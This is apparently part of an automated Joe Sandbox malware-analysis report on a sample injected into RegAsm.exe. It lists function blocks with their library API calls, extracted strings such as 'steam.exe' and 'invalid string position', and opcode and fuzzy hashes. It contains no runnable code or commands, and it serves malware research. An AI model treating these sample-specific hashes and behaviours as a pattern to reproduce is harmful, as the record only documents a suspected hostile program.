                                                                  • Part of subcall function 0040F238: std::_Xinvalid_argument.LIBCPMT ref: 0040F242
                                                                • _memmove.LIBCMT ref: 0040F190
                                                                Strings
                                                                • invalid string position, xrefs: 0040F139
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                • String ID: invalid string position
                                                                • API String ID: 3404309857-1799206989
                                                                • Opcode ID: 91242230ce68a24c4f38e49356161a9258fe8054196df98927784ca714c59dc8
                                                                • Instruction ID: e23b5eb9a1e42f9e221b8677ce3c7703de2c6ddbdd5f367577b3bfe0c378d6ff
                                                                • Opcode Fuzzy Hash: 91242230ce68a24c4f38e49356161a9258fe8054196df98927784ca714c59dc8
                                                                • Instruction Fuzzy Hash: 0111E131304210DBDB24DE6DD88095973A6AF55324754063BF815EFAC2C33CED49879A
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040F35C
                                                                  • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
                                                                  • Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
                                                                  • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80
                                                                • memmove.MSVCRT(0040EEBE,0040EEBE,C6C68B00,0040EEBE,0040EEBE,0040F15F,?,?,?,0040F1DF,?,?,?,74DF0440,?,-00000001), ref: 0040F392
                                                                Strings
                                                                • invalid string position, xrefs: 0040F357
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                • String ID: invalid string position
                                                                • API String ID: 1659287814-1799206989
                                                                • Opcode ID: 348d0c2b69c2b191df159d42681712194dc71b74dbe289b0b6df523c31963809
                                                                • Instruction ID: a91313bf5449129972d3e0b6c61bf396901b99abf7d864de5386db584678c47f
                                                                • Opcode Fuzzy Hash: 348d0c2b69c2b191df159d42681712194dc71b74dbe289b0b6df523c31963809
                                                                • Instruction Fuzzy Hash: 6F01AD713007018BD7348E7989C491FB2E2EB85B21734493ED882D7B85DB7CE84E8398
                                                                APIs
                                                                • strcpy_s.MSVCRT ref: 004281DE
                                                                • __invoke_watson.LIBCMT ref: 00428232
                                                                  • Part of subcall function 0042806D: _strcat_s.LIBCMT ref: 0042808C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __invoke_watson_strcat_sstrcpy_s
                                                                • String ID: ,NC
                                                                • API String ID: 1132195725-1329140791
                                                                • Opcode ID: 53b9d3399cf01edd424f01e545b4bf6b1a8555bf483cd13445593f0413521323
                                                                • Instruction ID: d9baa1639a8d6cddfa45c7016c3352d2dd6dfe7468836747954bbe6ada87296f
                                                                • Opcode Fuzzy Hash: 53b9d3399cf01edd424f01e545b4bf6b1a8555bf483cd13445593f0413521323
                                                                • Instruction Fuzzy Hash: 96F02872641228BFCF116FA0EC42EEF3F59AF00350F44806AF91955151DB369D54C764
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 004124B2
                                                                • CloseHandle.KERNEL32(00000000), ref: 00412521
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseH_prolog3_catch_Handle
                                                                • String ID: steam.exe
                                                                • API String ID: 860495366-2826358650
                                                                • Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                • Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
                                                                • Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                • Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __invoke_watson_strcat_s
                                                                • String ID: `8C
                                                                • API String ID: 228796091-1339866851
                                                                • Opcode ID: d2307989adf0da250e0c2039779c175f09f7b7af11d147463b8ee5fd369ca3e3
                                                                • Instruction ID: b7dcb7c8242e45e9edc672ca800bd55fb05ba849de6ed2c4d9e7ea01795509d3
                                                                • Opcode Fuzzy Hash: d2307989adf0da250e0c2039779c175f09f7b7af11d147463b8ee5fd369ca3e3
                                                                • Instruction Fuzzy Hash: 42E09273600219ABDF101E66EC4189F771AFF80368B46043AFE1852102D63599A69698
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: NameName::
                                                                • String ID: {flat}
                                                                • API String ID: 1333004437-2606204563
                                                                • Opcode ID: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
                                                                • Instruction ID: da75913b68d6d07b0bcc9ceeb751d75e82138ebb165cf24839429cfec7228cb0
                                                                • Opcode Fuzzy Hash: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
                                                                • Instruction Fuzzy Hash: 75F08535244208AFCB11EF59D445AE43BA0AF8575AF08808AF9484F293C774E882CB99
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus_memset
                                                                • String ID: @
                                                                • API String ID: 587104284-2766056989
                                                                • Opcode ID: ea78773fa3532b546fc2bed9ec4844f5fa5bd431fc3f66efb89effc32c35708b
                                                                • Instruction ID: 109ca1747397a3c99a2e715ad0f668a42f12933073e5ea0efda9a81ab0e3fd91
                                                                • Opcode Fuzzy Hash: ea78773fa3532b546fc2bed9ec4844f5fa5bd431fc3f66efb89effc32c35708b
                                                                • Instruction Fuzzy Hash: 7BE0B8F1D002089BDB54DFA5ED46B5D77F89B08708F5000299A05F7181D674AA099659